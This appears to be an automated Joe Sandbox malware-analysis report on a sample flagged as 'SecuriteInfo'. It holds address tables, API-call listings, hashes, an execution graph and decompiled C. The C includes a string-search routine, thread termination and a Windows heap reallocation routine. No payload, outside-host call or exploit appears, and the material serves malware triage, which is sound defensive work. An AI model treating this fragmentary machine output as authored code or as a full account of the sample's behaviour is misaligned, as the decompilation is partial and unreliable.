                                                    0x10001188
                                                    0x1000118d
                                                    0x1000118d
                                                    0x00000000
                                                    0x10001162
                                                    0x10001149
                                                    0x100011df
                                                    0x100011df
                                                    0x100011e6
                                                    0x100011f3
                                                    0x100011f8
                                                    0x100011fb
                                                    0x10001203
                                                    0x10001205
                                                    0x10001205
                                                    0x00000000
                                                    0x100011e6
                                                    0x1000114f
                                                    0x10001152
                                                    0x00000000
                                                    0x00000000
                                                    0x10001158
                                                    0x1000115b
                                                    0x100011ac
                                                    0x00000000
                                                    0x100011ac
                                                    0x1000115d
                                                    0x1000115f
                                                    0x10001192
                                                    0x00000000
                                                    0x10001192
                                                    0x00000000
                                                    0x100011c9
                                                    0x100011c9
                                                    0x100011d3
                                                    0x00000000
                                                    0x100011d7

                                                    APIs
                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                    • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                    • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                    • GlobalFree.KERNEL32(?), ref: 10001203
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39674247886.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000001.00000002.39674168804.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674313518.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674359830.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Global$Free$Alloc
                                                    • String ID:
                                                    • API String ID: 1780285237-0
                                                    • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                    • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                    • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                    • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405D4C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00405D4C(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                    0x00405d5c
                                                    0x00405d5e
                                                    0x00405d61
                                                    0x00405d8d
                                                    0x00405d66
                                                    0x00405d6f
                                                    0x00405d74
                                                    0x00405d7f
                                                    0x00405d82
                                                    0x00405d9e
                                                    0x00405d84
                                                    0x00405d8b
                                                    0x00000000
                                                    0x00405d8b
                                                    0x00405d97
                                                    0x00405d9b
                                                    0x00405d9b
                                                    0x00405d95
                                                    0x00000000

                                                    APIs
                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D74
                                                    • CharNextA.USER32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D85
                                                    • lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                    • String ID:
                                                    • API String ID: 190613189-0
                                                    • Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                    • Instruction ID: 1f72a7e7db10584d46f5d47bab472a29a69204e410489cb336b3e0253d2e012c
                                                    • Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                    • Instruction Fuzzy Hash: 31F09631104918FFC712DFA5DD0499FBBA8EF06350B2580BAE841F7251D674DE019F99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:0.1%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:9
                                                    Total number of Limit Nodes:2
                                                    execution_graph 70904 168073c 70907 1661572 70904->70907 70905 1680846 70906 16806cd TerminateThread 70906->70907 70907->70905 70907->70906 70907->70907 70909 1d7d2b10 LdrInitializeThunk 70911 1d7d2b20 70913 1d7d2b2a 70911->70913 70914 1d7d2b3f LdrInitializeThunk 70913->70914 70915 1d7d2b31 70913->70915

                                                    Executed Functions

                                                    Function 016806CD Relevance: 1.6, APIs: 1, Instructions: 103threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • TerminateThread.KERNELBASE ref: 016806D2
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44175421617.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1660000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: TerminateThread
                                                    • String ID:
                                                    • API String ID: 1852365436-0
                                                    • Opcode ID: 2b6ba48889ae542c513226490ea7978c227ba0a7a9705557ce9f017cab93ce9b
                                                    • Instruction ID: 138186b3e6394112f1d6dca28745eacb141154ee110bab745913d5a9c1cc6fbe
                                                    • Opcode Fuzzy Hash: 2b6ba48889ae542c513226490ea7978c227ba0a7a9705557ce9f017cab93ce9b
                                                    • Instruction Fuzzy Hash: E7318B70108386CBEF326E7C8DA47EA7B929F522A0F558329DCE64B197E3304402CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 25 1d7d2d10-1d7d2d1c LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9af79aaa912b3a9984f48ba09a92f58a20fb0a44a46d91902778a26cebc32f8b
                                                    • Instruction ID: 88cc3ac34b5b5a4610b4df0f2ac7c738ead4634ae58a8403a92c12ff7d1c8bf5
                                                    • Opcode Fuzzy Hash: 9af79aaa912b3a9984f48ba09a92f58a20fb0a44a46d91902778a26cebc32f8b
                                                    • Instruction Fuzzy Hash: D190023125101413D5116258460470B000947D0291FD1C916A4414518DD66A8952B123
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7D2B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 23 1d7d2b10-1d7d2b1c LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 37d33635d65f5619a3571ca06b28cbf1be6756e74593060d7307262544a10ae6
                                                    • Instruction ID: dc92f119742b6b82f8d91a97ec12f0aeeb2311dc2d57b54661b09bddab1503d7
                                                    • Opcode Fuzzy Hash: 37d33635d65f5619a3571ca06b28cbf1be6756e74593060d7307262544a10ae6
                                                    • Instruction Fuzzy Hash: CD90023125101802D5807258450464E000547D1351FD1C519A4015614DCA298A5977A3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7D2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 24 1d7d2b90-1d7d2b9c LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2766787ffaa10c1c2da4aadd4c2c75b706bfec98eabc11e2d3545d7472006673
                                                    • Instruction ID: 963218415500efdc751910c1f0b4111d4d93e16e906a2c16850ee868b39a90dc
                                                    • Opcode Fuzzy Hash: 2766787ffaa10c1c2da4aadd4c2c75b706bfec98eabc11e2d3545d7472006673
                                                    • Instruction Fuzzy Hash: 6590023125109802D5106258850474E000547D0351F95C915A8414618DC6A988917123
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7D2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 19 1d7d2b2a-1d7d2b2f 20 1d7d2b3f-1d7d2b46 LdrInitializeThunk 19->20 21 1d7d2b31-1d7d2b38 19->21
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: de20fac16bb0ac7e3f15f4aa48fd00675ee584a40d30f23f730df0ba4dc1aff2
                                                    • Instruction ID: f7ba6e0b7719afb1c561d301855aac767131ce7f51f15d0052772a8bd99742cd
                                                    • Opcode Fuzzy Hash: de20fac16bb0ac7e3f15f4aa48fd00675ee584a40d30f23f730df0ba4dc1aff2
                                                    • Instruction Fuzzy Hash: D9B092729469D6CAEA41EB604B08B1B7E006BD0761F66C566E24A0681E877CC092F277
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 1D83FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMONCrypto
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 904 1d83fdf4-1d83fe16 call 1d7e7be4 907 1d83fe35-1d83fe4d call 1d787662 904->907 908 1d83fe18-1d83fe30 RtlDebugPrintTimes 904->908 913 1d83fe53-1d83fe69 907->913 914 1d840277 907->914 912 1d8402d1-1d8402e0 908->912 916 1d83fe70-1d83fe72 913->916 917 1d83fe6b-1d83fe6e 913->917 915 1d84027a-1d8402ce call 1d8402e6 914->915 915->912 919 1d83fe73-1d83fe8a 916->919 917->919 920 1d83fe90-1d83fe93 919->920 921 1d840231-1d84023a GetPEB 919->921 920->921 923 1d83fe99-1d83fea2 920->923 925 1d84023c-1d840257 GetPEB call 1d78b910 921->925 926 1d840259-1d84025e call 1d78b910 921->926 927 1d83fea4-1d83febb call 1d79fed0 923->927 928 1d83febe-1d83fed1 call 1d840835 923->928 934 1d840263-1d840274 call 1d78b910 925->934 926->934 927->928 939 1d83fed3-1d83feda 928->939 940 1d83fedc-1d83fef0 call 1d78753f 928->940 934->914 939->940 943 1d83fef6-1d83ff02 GetPEB 940->943 944 1d840122-1d840127 940->944 945 1d83ff70-1d83ff7b 943->945 946 1d83ff04-1d83ff07 943->946 944->915 947 1d84012d-1d840139 GetPEB 944->947 950 1d83ff81-1d83ff88 945->950 951 1d840068-1d84007a call 1d7a2710 945->951 952 1d83ff26-1d83ff2b call 1d78b910 946->952 953 1d83ff09-1d83ff24 GetPEB call 1d78b910 946->953 948 1d8401a7-1d8401b2 947->948 949 1d84013b-1d84013e 947->949 948->915 959 1d8401b8-1d8401c3 948->959 954 1d840140-1d84015b GetPEB call 1d78b910 949->954 955 1d84015d-1d840162 call 1d78b910 949->955 950->951 958 1d83ff8e-1d83ff97 950->958 972 1d840110-1d84011d call 1d840d24 call 1d840835 951->972 973 1d840080-1d840087 951->973 963 1d83ff30-1d83ff51 call 1d78b910 GetPEB 952->963 953->963 971 1d840167-1d84017b call 1d78b910 954->971 955->971 966 1d83ff99-1d83ffa9 958->966 967 1d83ffb8-1d83ffbc 958->967 959->915 968 1d8401c9-1d8401d4 959->968 963->951 993 1d83ff57-1d83ff6b 963->993 966->967 974 1d83ffab-1d83ffb5 call 1d84d646 966->974 976 1d83ffce-1d83ffd4 967->976 977 1d83ffbe-1d83ffcc call 1d7c3ae9 967->977 968->915 975 1d8401da-1d8401e3 GetPEB 968->975 1003 1d84017e-1d840188 GetPEB 971->1003 972->944 982 1d840092-1d84009a 973->982 983 1d840089-1d840090 973->983 974->967 986 1d8401e5-1d840200 GetPEB call 1d78b910 975->986 987 1d840202-1d840207 call 1d78b910 975->987 979 1d83ffd7-1d83ffe0 976->979 977->979 991 1d83fff2-1d83fff5 979->991 992 1d83ffe2-1d83fff0 979->992 995 1d84009c-1d8400ac 982->995 996 1d8400b8-1d8400bc 982->996 983->982 1000 1d84020c-1d84022c call 1d83823a call 1d78b910 986->1000 987->1000 1001 1d840065 991->1001 1002 1d83fff7-1d83fffe 991->1002 992->991 993->951 995->996 1004 1d8400ae-1d8400b3 call 1d84d646 995->1004 1006 1d8400ec-1d8400f2 996->1006 1007 1d8400be-1d8400d1 call 1d7c3ae9 996->1007 1000->1003 1001->951 1002->1001 1010 1d840000-1d84000b 1002->1010 1003->915 1012 1d84018e-1d8401a2 1003->1012 1004->996 1011 1d8400f5-1d8400fc 1006->1011 1018 1d8400e3 1007->1018 1019 1d8400d3-1d8400e1 call 1d7bfdb9 1007->1019 1010->1001 1016 1d84000d-1d840016 GetPEB 1010->1016 1011->972 1017 1d8400fe-1d84010e 1011->1017 1012->915 1021 1d840035-1d84003a call 1d78b910 1016->1021 1022 1d840018-1d840033 GetPEB call 1d78b910 1016->1022 1017->972 1024 1d8400e6-1d8400ea 1018->1024 1019->1024 1030 1d84003f-1d84005d call 1d83823a call 1d78b910 1021->1030 1022->1030 1024->1011 1030->1001
                                                    C-Code - Quality: 64%
                                                    			E1D83FDF4(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t130;
				signed int _t132;
				intOrPtr _t138;
				intOrPtr _t139;
				signed int _t149;
				signed int _t150;
				intOrPtr _t151;
				signed int _t152;
				intOrPtr _t155;
				intOrPtr _t159;
				intOrPtr _t172;
				signed int _t173;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t183;
				void* _t184;
				signed char _t192;
				signed int _t193;
				intOrPtr _t195;
				intOrPtr _t199;
				signed int _t209;
				signed int _t226;
				signed char _t236;
				intOrPtr _t240;
				signed int* _t248;
				signed int _t253;
				signed int _t255;
				signed int _t267;
				signed int _t278;
				signed int* _t279;
				intOrPtr* _t283;
				void* _t284;
				void* _t286;

				_push(0x40);
				_push(0x1d86d430);
				E1D7E7BE4(__ebx, __edi, __esi);
				_t281 = __ecx;
				 *((intOrPtr*)(_t284 - 0x3c)) = __ecx;
				 *((char*)(_t284 - 0x19)) = 0;
				 *(_t284 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t284 - 4)) = 0;
					 *((intOrPtr*)(_t284 - 4)) = 1;
					_t130 = E1D787662("RtlReAllocateHeap");
					__eflags = _t130;
					if(_t130 == 0) {
						L72:
						 *(_t284 - 0x24) = 0;
						L73:
						 *((intOrPtr*)(_t284 - 4)) = 0;
						 *((intOrPtr*)(_t284 - 4)) = 0xfffffffe;
						E1D8402E6(_t281);
						_t132 =  *(_t284 - 0x24);
						goto L75;
					}
					_t236 =  *(__ecx + 0x44) | __edx;
					 *(_t284 - 0x30) = _t236;
					 *(_t284 - 0x34) = _t236 | 0x10000100;
					__eflags =  *(_t284 + 0xc);
					if( *(_t284 + 0xc) == 0) {
						_t267 = 1;
						__eflags = 1;
					} else {
						_t267 =  *(_t284 + 0xc);
					}
					_t138 = ( *((intOrPtr*)(_t281 + 0x94)) + _t267 &  *(_t281 + 0x98)) + 8;
					 *((intOrPtr*)(_t284 - 0x40)) = _t138;
					__eflags = _t138 -  *(_t284 + 0xc);
					if(_t138 <  *(_t284 + 0xc)) {
						L68:
						_t139 =  *[fs:0x30];
						__eflags =  *(_t139 + 0xc);
						if( *(_t139 + 0xc) == 0) {
							_push("HEAP: ");
							E1D78B910();
						} else {
							E1D78B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t281 + 0x78)));
						E1D78B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t284 + 0xc));
						goto L72;
					}
					__eflags = _t138 -  *((intOrPtr*)(_t281 + 0x78));
					if(_t138 >  *((intOrPtr*)(_t281 + 0x78))) {
						goto L68;
					}
					 *(_t284 - 0x20) = 0;
					__eflags = _t236 & 0x00000001;
					if((_t236 & 0x00000001) == 0) {
						E1D79FED0( *((intOrPtr*)(_t281 + 0xc8)));
						 *((char*)(_t284 - 0x19)) = 1;
						_t226 =  *(_t284 - 0x30) | 0x10000101;
						__eflags = _t226;
						 *(_t284 - 0x34) = _t226;
					}
					E1D840835(_t281, 0);
					_t277 =  *((intOrPtr*)(_t284 + 8));
					_t269 = _t277 - 8;
					__eflags =  *((char*)(_t269 + 7)) - 5;
					if( *((char*)(_t269 + 7)) == 5) {
						_t269 = _t269 - (( *(_t269 + 6) & 0x000000ff) << 3);
						__eflags = _t269;
					}
					 *(_t284 - 0x2c) = _t269;
					 *(_t284 - 0x28) = _t269;
					_t240 = _t281;
					_t149 = E1D78753F(_t240, _t269, "RtlReAllocateHeap");
					__eflags = _t149;
					if(_t149 == 0) {
						L53:
						_t150 =  *(_t284 - 0x24);
						__eflags = _t150;
						if(_t150 == 0) {
							goto L73;
						}
						__eflags = _t150 -  *0x1d8847c8; // 0x0
						_t151 =  *[fs:0x30];
						if(__eflags != 0) {
							_t152 =  *(_t151 + 0x68);
							 *(_t284 - 0x48) = _t152;
							__eflags = _t152 & 0x00000800;
							if((_t152 & 0x00000800) == 0) {
								goto L73;
							}
							__eflags =  *(_t284 - 0x20) -  *0x1d8847cc; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1d8847ce; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							_t155 =  *[fs:0x30];
							__eflags =  *(_t155 + 0xc);
							if( *(_t155 + 0xc) == 0) {
								_push("HEAP: ");
								E1D78B910();
							} else {
								E1D78B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(E1D83823A(_t281,  *(_t284 - 0x20)));
							_push( *(_t284 + 0xc));
							E1D78B910("Just reallocated block at %p to 0x%Ix bytes with tag %ws\n",  *(_t284 - 0x24));
							L59:
							_t159 =  *[fs:0x30];
							__eflags =  *((char*)(_t159 + 2));
							if( *((char*)(_t159 + 2)) != 0) {
								 *0x1d8847a1 = 1;
								 *0x1d884100 = 0;
								asm("int3");
								 *0x1d8847a1 = 0;
							}
							goto L73;
						}
						__eflags =  *(_t151 + 0xc);
						if( *(_t151 + 0xc) == 0) {
							_push("HEAP: ");
							E1D78B910();
						} else {
							E1D78B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E1D78B910("Just reallocated block at %p to %Ix bytes\n",  *0x1d8847c8);
						goto L59;
					} else {
						__eflags = _t277 -  *0x1d8847c8; // 0x0
						_t172 =  *[fs:0x30];
						if(__eflags != 0) {
							_t173 =  *(_t172 + 0x68);
							 *(_t284 - 0x44) = _t173;
							__eflags = _t173 & 0x00000800;
							if((_t173 & 0x00000800) == 0) {
								L38:
								_t174 = E1D7A2710(_t281,  *(_t284 - 0x34), _t277,  *(_t284 + 0xc));
								 *(_t284 - 0x24) = _t174;
								__eflags = _t174;
								if(_t174 != 0) {
									_t75 = _t174 - 8; // -8
									_t278 = _t75;
									__eflags =  *((char*)(_t278 + 7)) - 5;
									if( *((char*)(_t278 + 7)) == 5) {
										_t278 = _t278 - (( *(_t278 + 6) & 0x000000ff) << 3);
										__eflags = _t278;
									}
									_t248 = _t278;
									 *(_t284 - 0x28) = _t278;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *(_t278 + 3) - (_t248[0] ^ _t248[0] ^  *_t248);
										if(__eflags != 0) {
											_push(_t248);
											_t269 = _t278;
											E1D84D646(0, _t281, _t278, _t278, _t281, __eflags);
										}
									}
									__eflags =  *(_t278 + 2) & 0x00000002;
									if(( *(_t278 + 2) & 0x00000002) == 0) {
										_t177 =  *(_t278 + 3);
										 *(_t284 - 0x1b) = _t177;
										_t178 = _t177 & 0x000000ff;
									} else {
										_t183 = E1D7C3AE9(_t278);
										 *(_t284 - 0x30) = _t183;
										__eflags =  *(_t281 + 0x40) & 0x08000000;
										if(( *(_t281 + 0x40) & 0x08000000) == 0) {
											 *_t183 = 0;
										} else {
											_t184 = E1D7BFDB9(1, _t269);
											_t253 =  *(_t284 - 0x30);
											 *_t253 = _t184;
											_t183 = _t253;
										}
										_t178 =  *((intOrPtr*)(_t183 + 2));
									}
									 *(_t284 - 0x20) = _t178;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *(_t278 + 3) =  *(_t278 + 2) ^  *(_t278 + 1) ^  *_t278;
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *_t278;
									}
								}
								E1D840D24(_t281);
								__eflags = 0;
								E1D840835(_t281, 0);
								goto L53;
							}
							__eflags =  *0x1d8847cc;
							if( *0x1d8847cc == 0) {
								goto L38;
							}
							_t279 =  *(_t284 - 0x28);
							_t269 =  *(_t284 - 0x2c);
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags = _t279[0] - ( *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269);
								if(__eflags != 0) {
									_push(_t240);
									E1D84D646(0, _t281, _t279, _t279, _t281, __eflags);
									_t269 =  *(_t284 - 0x2c);
								}
							}
							__eflags = _t279[0] & 0x00000002;
							if((_t279[0] & 0x00000002) == 0) {
								_t192 = _t279[0];
								 *(_t284 - 0x1a) = _t192;
								_t193 = _t192 & 0x000000ff;
							} else {
								_t209 = E1D7C3AE9(_t279);
								 *(_t284 - 0x30) = _t209;
								_t193 =  *(_t209 + 2) & 0x0000ffff;
							}
							_t255 = _t193;
							 *(_t284 - 0x20) = _t193;
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								_t279[0] =  *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269;
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags =  *_t279;
							}
							__eflags = _t255;
							if(_t255 == 0) {
								L37:
								_t277 =  *((intOrPtr*)(_t284 + 8));
							} else {
								__eflags = _t255 -  *0x1d8847cc; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1d8847ce; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								_t195 =  *[fs:0x30];
								__eflags =  *(_t195 + 0xc);
								if( *(_t195 + 0xc) == 0) {
									_push("HEAP: ");
									E1D78B910();
								} else {
									E1D78B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t269 =  *(_t284 - 0x20);
								_push(E1D83823A(_t281,  *(_t284 - 0x20)));
								_push( *(_t284 + 0xc));
								_t277 =  *((intOrPtr*)(_t284 + 8));
								E1D78B910("About to rellocate block at %p to 0x%Ix bytes with tag %ws\n",  *((intOrPtr*)(_t284 + 8)));
								_t286 = _t286 + 0x10;
								L18:
								_t199 =  *[fs:0x30];
								__eflags =  *((char*)(_t199 + 2));
								if( *((char*)(_t199 + 2)) != 0) {
									 *0x1d8847a1 = 1;
									 *0x1d884100 = 0;
									asm("int3");
									 *0x1d8847a1 = 0;
								}
							}
							goto L38;
						}
						__eflags =  *(_t172 + 0xc);
						if( *(_t172 + 0xc) == 0) {
							_push("HEAP: ");
							E1D78B910();
						} else {
							E1D78B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E1D78B910("About to reallocate block at %p to %Ix bytes\n",  *0x1d8847c8);
						_t286 = _t286 + 0xc;
						goto L18;
					}
				} else {
					_t283 =  *0x1d88374c; // 0x0
					 *0x1d8891e0(__ecx, __edx,  *((intOrPtr*)(_t284 + 8)),  *(_t284 + 0xc));
					_t132 =  *_t283();
					L75:
					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0x10));
					return _t132;
				}
			}





































                                                    0x1d83fdf4
                                                    0x1d83fdf6
                                                    0x1d83fdfb
                                                    0x1d83fe02
                                                    0x1d83fe04
                                                    0x1d83fe09
                                                    0x1d83fe0c
                                                    0x1d83fe16
                                                    0x1d83fe35
                                                    0x1d83fe38
                                                    0x1d83fe46
                                                    0x1d83fe4b
                                                    0x1d83fe4d
                                                    0x1d840277
                                                    0x1d840277
                                                    0x1d84027a
                                                    0x1d84027a
                                                    0x1d8402c2
                                                    0x1d8402c9
                                                    0x1d8402ce
                                                    0x00000000
                                                    0x1d8402ce
                                                    0x1d83fe56
                                                    0x1d83fe58
                                                    0x1d83fe62
                                                    0x1d83fe65
                                                    0x1d83fe69
                                                    0x1d83fe72
                                                    0x1d83fe72
                                                    0x1d83fe6b
                                                    0x1d83fe6b
                                                    0x1d83fe6b
                                                    0x1d83fe81
                                                    0x1d83fe84
                                                    0x1d83fe87
                                                    0x1d83fe8a
                                                    0x1d840231
                                                    0x1d840231
                                                    0x1d840237
                                                    0x1d84023a
                                                    0x1d840259
                                                    0x1d84025e
                                                    0x1d84023c
                                                    0x1d840251
